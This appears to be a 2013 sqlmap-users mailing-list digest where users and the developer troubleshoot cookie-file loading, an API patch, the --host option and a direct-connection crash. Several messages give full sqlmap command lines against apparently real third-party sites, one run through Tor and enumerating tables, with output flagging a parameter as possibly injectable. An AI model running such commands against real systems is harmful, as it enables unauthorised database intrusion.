cookies file '/tmp/sqlmapcj-pbP7P1': > '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'') > > the 999.. looks strange to me. 
> > > > > > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar < > mir...@gm... <mailto:mir...@gm...>> wrote: > > > > Hi Dirk. > > > > Well, I would say that you have an expired cookie. Do you see that > value 0? That value should be a valid UNIX time representing time of cookie > expiration. Also, I've just tested that cookie of yours and sqlmap says: > "[WARNING] cookie '....' has expired" > > > > that's true but IMO 0 represents just a session cookie. Example: > > prompt% wget -q -O /dev/null --keep-session-cookies > --save-cookies=/dev/stdout bing.com > # HTTP cookie file. > # Generated by Wget on 2013-04-15 11:23:13. > # Edit at your own risk. > > .bing.com TRUE / FALSE 1429089794 SRCHUSR > AUTOREDIR=0&GEOVAR=&DOB=20130415 > .bing.com TRUE / FALSE 1429089794 SRCHD > D=2781203&MS=2781203&AF=NOFORM > .bing.com TRUE / FALSE 1429089794 OrigMUID > 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe > .bing.com TRUE / FALSE 1429089794 MUID > 333995A69E06630B2EB491169F016314 > .bing.com TRUE / FALSE 0 _SS > SID=B954CB7EDF8643CABAD8013F27A241E7 > .bing.com TRUE / FALSE 0 _HOP > .bing.com TRUE / FALSE 0 _FS NU=1 > .bing.com TRUE / FALSE 1429089794 _FP EM=1 > www.bing.com FALSE / FALSE 1429089794 SRCHUID > V=2&GUID=975091780DFF407DA9DD07139FD97C4D > www.bing.com FALSE / FALSE 1429089794 MUIDB > 333995A69E06630B2EB491169F016314 > > prompt% > > Same parser problem btw if I edit the cookie file and put 1429089794 unix > time instead of 0 in there. > > Ok: With the prev rev ed5599f it reads this file ok (no session cookies > but cookies w/ expiration date) and uses the last > cookie only for the first 120 tries. > > Cheers, Dirk > > > > > > Kind regards, > > Miroslav Stampar > > > > > > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...<mailto: > sp...@dr...>> wrote: > > > > > > Hi Miroslav, > > > > thx for your prompt answer. > > > > On 04/12/2013 07:45 PM, Miroslav Stampar wrote: > > > Hi Dirk. 
> > > > > > Could you please get the latest revision and retry it again? > > ed5599f: almost the same: with cookie in the header sqlmap takes > only this one. > > The slight difference seems to be that in the case where I > didn't supply a cookie > > sqlmap doesn't use any cookie at all, i.e. now not the one from > the server anymore. > > > > > > There was a situation where info messages have been wrongly > written that original response contained Set-Cookie in situations like > yours. > > > > > > In case that everything stays as it is, I'll need to ask you > to provide more details. For example, cookie file would be great. > > > > sure, here you go: > > > > --snip > > # Netscape HTTP Cookie File > > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID > \t <Cookie> > > [..] > > --snap > > > > They are all session cookies. For easier reading here I put some > blanks in the line > > above, in "cookie-file" there aren't any though. Cookies were > generated with > > stompy and a shell script (looks he same as with > > wget -S -O /dev/null --keep-session-cookies > --save-cookies=<file> <URL>) > > > > Again: sqlmap doesn't hiccup/complain while eating my cookies > file ;-) > > > > > > > > Also, please make sure that the cookie file contains proper > cookie(s) - domain name should be the same as a domain of target, cookie > needs to have a proper valid time, etc. > > > > see above. > > > > Cheers, > > > > Dirk > > > > > > > > > > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter < > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto: > sp...@dr...>>> wrote: > > > > > > Hi Miroslav, > > > > > > yes unfortunately. > > > > > > If I omit the cookie line in the request header > completely, sqlmap > > > seems to take the first cookie issued by the server with > set-cookie (and > > > put's it silently in). > > > > > > Cheers, > > > > > > Dirk > > > > > > > > > > > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote: > > > > Hi. 
> > > > > > > > And this is also happening if you are skipping "Cookie: > JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request? > > > > > > > > Kind regards, > > > > Miroslav Stampar > > > > > > > > > > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter < > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto: > sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...> > <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote: > > > > > > > > > > > > Hi folks, > > > > > > > > .... that doesn't work for me. It always uses the > cookie supplied > > > > (below in $REQUEST, or if I omit the line in > $REQUEST the one > > > > from the 1st server reply is being used) > > > > > > > > So what is wrong in here: > > > > > > > > cd > ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce > > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \ > > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \ > > > > --level=2 --risk=2 -r $REQUEST > > > > > > > > The content of the file $REQUEST is: > > > > > > > > POST <URL> HTTP/1.1 > > > > Host: <HOST> > > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; > en-US) AppleWebKit/525.13 (KHTML, like Gecko) > > > > Chrome/0.2.149.6 <http://0.2.149.6> < > http://0.2.149.6> <http://0.2.149.6> Safari/525.13 > > > > Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > > > > Accept-Language: en-US,en;q=0.5 > > > > Accept-Encoding: gzip, deflate > > > > Referer: <Referer> > > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7 > > > > Connection: keep-alive > > > > Content-Type: application/x-www-form-urlencoded > > > > Content-Length: 67 > > > > > > > > <abunchofpostparams> > > > > > > > > > > > > No hints that cookie-file is not in correct format > (I've been through this, > > > > at least I think I so ;) ). > > > > > > > > Any insight would be much appreciated. 
> > > > > > > > > > > > Cheers, > > > > > > > > Dirk > > > > > > > > > > > > > ------------------------------------------------------------------------------ > > > > Precog is a next-generation analytics platform > capable of advanced > > > > analytics on semi-structured data. The platform > includes APIs for building > > > > apps and a phenomenal toolset for data science. > Developers can use > > > > our toolset for easy data analysis & visualization. > Get a free account! > > > > > http://www2.precog.com/precogplatform/slashdotnewsletter > > > > _______________________________________________ > > > > sqlmap-users mailing list > > > > sql...@li... <mailto: > sql...@li...> <mailto: > sql...@li... <mailto: > sql...@li...>> <mailto: > sql...@li... <mailto: > sql...@li...> <mailto: > sql...@li... <mailto: > sql...@li...>>> > > > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > > > > > > > > > > > > > > -- > > > > Miroslav Stampar > > > > http://about.me/stamparm > > > > > > > > > > > > > > > -- > > > Miroslav Stampar > > > http://about.me/stamparm > > > > > > > > > > -- > > Miroslav Stampar > > http://about.me/stamparm > > > > > > > > > > -- > > Miroslav Stampar > > http://about.me/stamparm > > > > > ------------------------------ > > Message: 3 > Date: Mon, 15 Apr 2013 11:45:19 +0200 > From: Miroslav Stampar <mir...@gm...> > Subject: Re: [sqlmap-users] --load-cookies > To: Dirk Wetter <sp...@dr...> > Cc: SqlMap List <sql...@li...> > Message-ID: > <CA+9yoX0yAGFkCiLuycVqdbm8jvnMeEPgJdXoYZi_4NTW-YQo=Q...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > Hi Dirk. > > Now that crash should be "patched". > > Could you please retry it now and say if the latest revision suits your > needs? 
> > Kind regards, > Miroslav Stampar > > > On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...> wrote: > > > > > > > On 04/14/2013 01:14 AM, Miroslav Stampar wrote: > > > Nevertheless, with the latest commit that check should be "neutralized" > > now. Could you please retry it now? > > > > thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib > > hiccups, using the same file: > > > > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib > bug! > > Traceback (most recent call last): > > File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in > > _really_load > > assert domain_specified == initial_dot > > AssertionError > > > > _warn_unhandled_exception() > > [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid > > Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': > > > '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'') > > > > the 999.. looks strange to me. > > > > > > > > > > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar < > > mir...@gm... <mailto:mir...@gm...>> wrote: > > > > > > Hi Dirk. > > > > > > Well, I would say that you have an expired cookie. Do you see that > > value 0? That value should be a valid UNIX time representing time of > cookie > > expiration. Also, I've just tested that cookie of yours and sqlmap says: > > "[WARNING] cookie '....' has expired" > > > > > > > that's true but IMO 0 represents just a session cookie. Example: > > > > prompt% wget -q -O /dev/null --keep-session-cookies > > --save-cookies=/dev/stdout bing.com > > # HTTP cookie file. > > # Generated by Wget on 2013-04-15 11:23:13. > > # Edit at your own risk. 
> > > > .bing.com TRUE / FALSE 1429089794 SRCHUSR > > AUTOREDIR=0&GEOVAR=&DOB=20130415 > > .bing.com TRUE / FALSE 1429089794 SRCHD > > D=2781203&MS=2781203&AF=NOFORM > > .bing.com TRUE / FALSE 1429089794 OrigMUID > > 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe > > .bing.com TRUE / FALSE 1429089794 MUID > > 333995A69E06630B2EB491169F016314 > > .bing.com TRUE / FALSE 0 _SS > > SID=B954CB7EDF8643CABAD8013F27A241E7 > > .bing.com TRUE / FALSE 0 _HOP > > .bing.com TRUE / FALSE 0 _FS NU=1 > > .bing.com TRUE / FALSE 1429089794 _FP EM=1 > > www.bing.com FALSE / FALSE 1429089794 SRCHUID > > V=2&GUID=975091780DFF407DA9DD07139FD97C4D > > www.bing.com FALSE / FALSE 1429089794 MUIDB > > 333995A69E06630B2EB491169F016314 > > > > prompt% > > > > Same parser problem btw if I edit the cookie file and put 1429089794 unix > > time instead of 0 in there. > > > > Ok: With the prev rev ed5599f it reads this file ok (no session cookies > > but cookies w/ expiration date) and uses the last > > cookie only for the first 120 tries. > > > > Cheers, Dirk > > > > > > > > > > Kind regards, > > > Miroslav Stampar > > > > > > > > > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr... > <mailto: > > sp...@dr...>> wrote: > > > > > > > > > Hi Miroslav, > > > > > > thx for your prompt answer. > > > > > > On 04/12/2013 07:45 PM, Miroslav Stampar wrote: > > > > Hi Dirk. > > > > > > > > Could you please get the latest revision and retry it again? > > > ed5599f: almost the same: with cookie in the header sqlmap > takes > > only this one. > > > The slight difference seems to be that in the case where I > > didn't supply a cookie > > > sqlmap doesn't use any cookie at all, i.e. now not the one from > > the server anymore. > > > > > > > > There was a situation where info messages have been wrongly > > written that original response contained Set-Cookie in situations like > > yours. 
> > > > > > > > In case that everything stays as it is, I'll need to ask you > > to provide more details. For example, cookie file would be great. > > > > > > sure, here you go: > > > > > > --snip > > > # Netscape HTTP Cookie File > > > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID > > \t <Cookie> > > > [..] > > > --snap > > > > > > They are all session cookies. For easier reading here I put > some > > blanks in the line > > > above, in "cookie-file" there aren't any though. Cookies were > > generated with > > > stompy and a shell script (looks he same as with > > > wget -S -O /dev/null --keep-session-cookies > > --save-cookies=<file> <URL>) > > > > > > Again: sqlmap doesn't hiccup/complain while eating my cookies > > file ;-) > > > > > > > > > > > Also, please make sure that the cookie file contains proper > > cookie(s) - domain name should be the same as a domain of target, cookie > > needs to have a proper valid time, etc. > > > > > > see above. > > > > > > Cheers, > > > > > > Dirk > > > > > > > > > > > > > > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter < > > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... > <mailto: > > sp...@dr...>>> wrote: > > > > > > > > Hi Miroslav, > > > > > > > > yes unfortunately. > > > > > > > > If I omit the cookie line in the request header > > completely, sqlmap > > > > seems to take the first cookie issued by the server with > > set-cookie (and > > > > put's it silently in). > > > > > > > > Cheers, > > > > > > > > Dirk > > > > > > > > > > > > > > > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote: > > > > > Hi. > > > > > > > > > > And this is also happening if you are skipping "Cookie: > > JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request? > > > > > > > > > > Kind regards, > > > > > Miroslav Stampar > > > > > > > > > > > > > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter < > > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... > <mailto: > > sp...@dr...>> <mailto:sp...@dr... 
<mailto:sp...@dr...> > > <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote: > > > > > > > > > > > > > > > Hi folks, > > > > > > > > > > .... that doesn't work for me. It always uses the > > cookie supplied > > > > > (below in $REQUEST, or if I omit the line in > > $REQUEST the one > > > > > from the 1st server reply is being used) > > > > > > > > > > So what is wrong in here: > > > > > > > > > > cd > > ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce > > > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \ > > > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \ > > > > > --level=2 --risk=2 -r $REQUEST > > > > > > > > > > The content of the file $REQUEST is: > > > > > > > > > > POST <URL> HTTP/1.1 > > > > > Host: <HOST> > > > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT > 5.2; > > en-US) AppleWebKit/525.13 (KHTML, like Gecko) > > > > > Chrome/0.2.149.6 <http://0.2.149.6> < > > http://0.2.149.6> <http://0.2.149.6> Safari/525.13 > > > > > Accept: > > text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > > > > > Accept-Language: en-US,en;q=0.5 > > > > > Accept-Encoding: gzip, deflate > > > > > Referer: <Referer> > > > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7 > > > > > Connection: keep-alive > > > > > Content-Type: application/x-www-form-urlencoded > > > > > Content-Length: 67 > > > > > > > > > > <abunchofpostparams> > > > > > > > > > > > > > > > No hints that cookie-file is not in correct format > > (I've been through this, > > > > > at least I think I so ;) ). > > > > > > > > > > Any insight would be much appreciated. > > > > > > > > > > > > > > > Cheers, > > > > > > > > > > Dirk > > > > > > > > > > > > > > > > > > ------------------------------------------------------------------------------ > > > > > Precog is a next-generation analytics platform > > capable of advanced > > > > > analytics on semi-structured data. The platform > > includes APIs for building > > > > > apps and a phenomenal toolset for data science. 
> > Developers can use > > > > > our toolset for easy data analysis & visualization. > > Get a free account! > > > > > > > http://www2.precog.com/precogplatform/slashdotnewsletter > > > > > _______________________________________________ > > > > > sqlmap-users mailing list > > > > > sql...@li... <mailto: > > sql...@li...> <mailto: > > sql...@li... <mailto: > > sql...@li...>> <mailto: > > sql...@li... <mailto: > > sql...@li...> <mailto: > > sql...@li... <mailto: > > sql...@li...>>> > > > > > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > > > > > > > > > > > > > > > > > > > -- > > > > > Miroslav Stampar > > > > > http://about.me/stamparm > > > > > > > > > > > > > > > > > > > > -- > > > > Miroslav Stampar > > > > http://about.me/stamparm > > > > > > > > > > > > > > > -- > > > Miroslav Stampar > > > http://about.me/stamparm > > > > > > > > > > > > > > > -- > > > Miroslav Stampar > > > http://about.me/stamparm > > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 4 > Date: Mon, 15 Apr 2013 11:46:21 +0200 > From: Miroslav Stampar <mir...@gm...> > Subject: Re: [sqlmap-users] Patch for /task/<task_id>/delete in > clean_filesystem > To: Brandon Perry <bpe...@gm...> > Cc: sqlmap users <sql...@li...> > Message-ID: > <CA+9yoX3RNQDm=PqT...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > Hi Brandon. > > Thank you for your patch and find it now included [1]. > > Kind regards, > Miroslav Stampar > > [1] > > https://github.com/sqlmapproject/sqlmap/commit/8853e43616e89f26cfd6d1c1540e02ed6b4ca224 > > > On Sat, Apr 13, 2013 at 8:36 PM, Brandon Perry <bpe...@gm... > >wrote: > > > Hi, the attached patch fixes an issue with the /task/<task_id>/delete api > > call when self.output_directory is NoneType and clean_system() is called. 
> > > > -- > > http://volatile-minds.blogspot.com -- blog > > http://www.volatileminds.net -- website > > > > > > > ------------------------------------------------------------------------------ > > Precog is a next-generation analytics platform capable of advanced > > analytics on semi-structured data. The platform includes APIs for > building > > apps and a phenomenal toolset for data science. Developers can use > > our toolset for easy data analysis & visualization. Get a free account! > > http://www2.precog.com/precogplatform/slashdotnewsletter > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 5 > Date: Mon, 15 Apr 2013 12:19:13 +0200 > From: Dirk Wetter <sp...@dr...> > Subject: Re: [sqlmap-users] --load-cookies > To: Miroslav Stampar <mir...@gm...> > Cc: SqlMap List <sql...@li...> > Message-ID: <516...@dr...> > Content-Type: text/plain; charset=ISO-8859-1 > > Hi Miroslav, > > On 04/15/2013 11:45 AM, Miroslav Stampar wrote: > > Hi Dirk. > > > > Now that crash should be "patched". > > > > Could you please retry it now and say if the latest revision suits your > needs? > > cool, thx. Works! > > However (sorry): > > One needs to omit the cookie in the request header, otherwise it just uses > the one > supplied by the request. > > Then: It doesn't change the cookie. Maybe I was interpreting that not > correctly > but my point was using the load-cookies option to direct sqlmap to change > cookies once in a while (whenever that's gonna be). This is to circumvent > restrictions one can encounter otherwise.... 
> > Cheers, > > Dirk > > > > > > Kind regards, > > Miroslav Stampar > > > > > > On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...<mailto: > sp...@dr...>> wrote: > > > > > > > > On 04/14/2013 01:14 AM, Miroslav Stampar wrote: > > > Nevertheless, with the latest commit that check should be > "neutralized" now. Could you please retry it now? > > > > thx, Miroslav. I tried (b6fee63) but this time the cookie parser > lib hiccups, using the same file: > > > > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: > cookielib bug! > > Traceback (most recent call last): > > File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in > _really_load > > assert domain_specified == initial_dot > > AssertionError > > > > _warn_unhandled_exception() > > [11:13:26] [CRITICAL] there was a problem loading cookies file > ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': > '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'') > > > > the 999.. looks strange to me. > > > > > > > > > > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar < > mir...@gm... <mailto:mir...@gm...> <mailto: > mir...@gm... <mailto:mir...@gm...>>> wrote: > > > > > > Hi Dirk. > > > > > > Well, I would say that you have an expired cookie. Do you see > that value 0? That value should be a valid UNIX time representing time of > cookie expiration. Also, I've just tested that cookie of yours and sqlmap > says: "[WARNING] cookie '....' has expired" > > > > > > > that's true but IMO 0 represents just a session cookie. Example: > > > > prompt% wget -q -O /dev/null --keep-session-cookies > --save-cookies=/dev/stdout bing.com <http://bing.com> > > # HTTP cookie file. > > # Generated by Wget on 2013-04-15 11:23:13. > > # Edit at your own risk. 
> > > > .bing.com <http://bing.com> TRUE / FALSE > 1429089794 SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415 > > .bing.com <http://bing.com> TRUE / FALSE > 1429089794 SRCHD D=2781203&MS=2781203&AF=NOFORM > > .bing.com <http://bing.com> TRUE / FALSE > 1429089794 OrigMUID > 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe > > .bing.com <http://bing.com> TRUE / FALSE > 1429089794 MUID 333995A69E06630B2EB491169F016314 > > .bing.com <http://bing.com> TRUE / FALSE 0 > _SS SID=B954CB7EDF8643CABAD8013F27A241E7 > > .bing.com <http://bing.com> TRUE / FALSE 0 > _HOP > > .bing.com <http://bing.com> TRUE / FALSE 0 > _FS NU=1 > > .bing.com <http://bing.com> TRUE / FALSE > 1429089794 _FP EM=1 > > www.bing.com <http://www.bing.com> FALSE / FALSE > 1429089794 SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D > > www.bing.com <http://www.bing.com> FALSE / FALSE > 1429089794 MUIDB 333995A69E06630B2EB491169F016314 > > > > prompt% > > > > Same parser problem btw if I edit the cookie file and put 1429089794 > unix time instead of 0 in there. > > > > Ok: With the prev rev ed5599f it reads this file ok (no session > cookies but cookies w/ expiration date) and uses the last > > cookie only for the first 120 tries. > > > > Cheers, Dirk > > > > > > > > > > Kind regards, > > > Miroslav Stampar > > > > > > > > > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter < > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto: > sp...@dr...>>> wrote: > > > > > > > > > Hi Miroslav, > > > > > > thx for your prompt answer. > > > > > > On 04/12/2013 07:45 PM, Miroslav Stampar wrote: > > > > Hi Dirk. > > > > > > > > Could you please get the latest revision and retry it > again? > > > ed5599f: almost the same: with cookie in the header sqlmap > takes only this one. > > > The slight difference seems to be that in the case where I > didn't supply a cookie > > > sqlmap doesn't use any cookie at all, i.e. now not the one > from the server anymore. 
> > > > > > > > There was a situation where info messages have been > wrongly written that original response contained Set-Cookie in situations > like yours. > > > > > > > > In case that everything stays as it is, I'll need to ask > you to provide more details. For example, cookie file would be great. > > > > > > sure, here you go: > > > > > > --snip > > > # Netscape HTTP Cookie File > > > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t > JSESSIONID \t <Cookie> > > > [..] > > > --snap > > > > > > They are all session cookies. For easier reading here I > put some blanks in the line > > > above, in "cookie-file" there aren't any though. Cookies > were generated with > > > stompy and a shell script (looks he same as with > > > wget -S -O /dev/null --keep-session-cookies > --save-cookies=<file> <URL>) > > > > > > Again: sqlmap doesn't hiccup/complain while eating my > cookies file ;-) > > > > > > > > > > > Also, please make sure that the cookie file contains > proper cookie(s) - domain name should be the same as a domain of target, > cookie needs to have a proper valid time, etc. > > > > > > see above. > > > > > > Cheers, > > > > > > Dirk > > > > > > > > > > > > > > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter < > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto: > sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...> > <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote: > > > > > > > > Hi Miroslav, > > > > > > > > yes unfortunately. > > > > > > > > If I omit the cookie line in the request header > completely, sqlmap > > > > seems to take the first cookie issued by the server > with set-cookie (and > > > > put's it silently in). > > > > > > > > Cheers, > > > > > > > > Dirk > > > > > > > > > > > > > > > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote: > > > > > Hi. > > > > > > > > > > And this is also happening if you are skipping > "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original > request? 
> > > > > > > > > > Kind regards, > > > > > Miroslav Stampar > > > > > > > > > > > > > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter < > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto: > sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...> > <mailto:sp...@dr... <mailto:sp...@dr...>>> <mailto: > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto: > sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...> > <mailto:sp...@dr... <mailto:sp...@dr...>>>>> wrote: > > > > > > > > > > > > > > > Hi folks, > > > > > > > > > > .... that doesn't work for me. It always uses > the cookie supplied > > > > > (below in $REQUEST, or if I omit the line in > $REQUEST the one > > > > > from the 1st server reply is being used) > > > > > > > > > > So what is wrong in here: > > > > > > > > > > cd > ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce > > > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \ > > > > > --threads=8 -v 6 > --load-cookies=$WD/cookie-file \ > > > > > --level=2 --risk=2 -r $REQUEST > > > > > > > > > > The content of the file $REQUEST is: > > > > > > > > > > POST <URL> HTTP/1.1 > > > > > Host: <HOST> > > > > > User-Agent: Mozilla/5.0 (Windows; U; Windows > NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) > > > > > Chrome/0.2.149.6 <http://0.2.149.6> < > http://0.2.149.6> <http://0.2.149.6> <http://0.2.149.6> Safari/525.13 > > > > > Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > > > > > Accept-Language: en-US,en;q=0.5 > > > > > Accept-Encoding: gzip, deflate > > > > > Referer: <Referer> > > > > > Cookie: > JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7 > > > > > Connection: keep-alive > > > > > Content-Type: application/x-www-form-urlencoded > > > > > Content-Length: 67 > > > > > > > > > > <abunchofpostparams> > > > > > > > > > > > > > > > No hints that cookie-file is not in correct > format (I've been through this, > > > > > at least I think I so ;) ). > > > > > > > > > > Any insight would be much appreciated. 
> > > > > > > > > > > > > > > Cheers, > > > > > > > > > > Dirk > > > > > > -- > > Miroslav Stampar > > http://about.me/stamparm > > > > > ------------------------------ > > Message: 6 > Date: Mon, 15 Apr 2013 14:01:01 -0700 > From: <co...@5i...> > Subject: [sqlmap-users] --host parameter > To: sql...@li... > Message-ID: > < > 201...@em... 
> > > > Content-Type: text/plain; charset="utf-8" > > Hello, > the --host doesn't work as expected, or I am doing something wrong: > > > this works as expected: > > ./sqlmap.py --url='http://i.csland.ro/index.php?id=0' > > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database > takeover tool > http://sqlmap.org > > [!] legal disclaimer: Usage of sqlmap for attacking targets without > prior mutual consent is illegal. It is the end user's responsibility to > obey all applicable local, state and federal laws. Developers assume no > liability and are not responsible for any misuse or damage caused by > this program > > [*] starting at 23:57:15 > > [23:57:15] [INFO] testing connection to the target URL > [23:57:15] [INFO] heuristics detected web page charset 'ascii' > [23:57:15] [INFO] testing if the target URL is stable. This can take a > couple of seconds > [23:57:16] [INFO] target URL is stable > [23:57:16] [INFO] testing if GET parameter 'id' is dynamic > [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic > [23:57:16] [INFO] GET parameter 'id' is dynamic > [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id' > might be injectable (possible DBMS: 'MySQL') > [23:57:16] [INFO] testing for SQL injection on GET parameter 'id' > > > .... > > > this doesn't work as expected: > > ./sqlmap.py --host='i.csland.ro' > --url='http://188.240.236.15/index.php?id=0' > > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database > takeover tool > http://sqlmap.org > > [!] legal disclaimer: Usage of sqlmap for attacking targets without > prior mutual consent is illegal. It is the end user's responsibility to > obey all applicable local, state and federal laws. 
Developers assume no > liability and are not responsible for any misuse or damage caused by > this program > > [*] starting at 23:58:03 > > [23:58:03] [INFO] testing connection to the target URL > [23:58:03] [CRITICAL] page not found (404) > it is not recommended to continue in this kind of cases. Do you want to > quit and make sure that everything is set up properly? [Y/n] > [23:58:05] [WARNING] HTTP error codes detected during run: > > ............ > > > Of course i.csland.ro resolves to 188.240.236.15. Any idea? > > Thanks. > > > > > ------------------------------ > > Message: 7 > Date: Tue, 16 Apr 2013 09:12:05 +1100 > From: ???????? ?????? <vo...@s2...> > Subject: [sqlmap-users] Sqlmap and direct connect error > To: sql...@li... > Message-ID: <C59...@s2...> > Content-Type: text/plain; charset=us-ascii > > Hi! > > This bug detected if add direct param. > > python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u " > http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables > --exclude-sysdbs > > > [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, retry > your run with the latest development version from the GitHub repository. If > the exception persists, please send by e-mail to ' > sql...@li...' or open a new issue at ' > https://github.com/sqlmapproject/sqlmap/issues/new' with the following > text and any information required to reproduce the bug. The developers will > try to reproduce the bug, fix it accordingly and get back to you. 
> sqlmap version: 1.0-dev-de99717 > Python version: 2.7.3 > Operating system: posix > Command line: sqlmap.py -d > **************************************************** -u > http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables > --exclude-sysdbs > Technique: None > Back-end DBMS: MySQL (identified) > Traceback (most recent call last): > File "sqlmap.py", line 87, in main > start() > File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in > start > action() > File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action > setHandler() > File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in > setHandler > conf.dbmsConnector.connect() > File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in > connect > self.connector = pymysql.connect(host=self.hostname, user=self.user, > passwd=self.password, db=self.db, port=self.port, > connect_timeout=conf.timeout, use_unicode=True) > File > "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", > line 93, in Connect > return Connection(*args, **kwargs) > File > "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", > line 584, in __init__ > self._connect() > File > "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", > line 739, in _connect > sock.connect((self.host, self.port)) > File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in > connect > raise GeneralProxyError((5, _generalerrors[5])) > GeneralProxyError: (5, 'bad input') > > > > > ------------------------------ > > Message: 8 > Date: Tue, 16 Apr 2013 14:19:18 +0200 > From: Miroslav Stampar <mir...@gm...> > Subject: Re: [sqlmap-users] --host parameter > 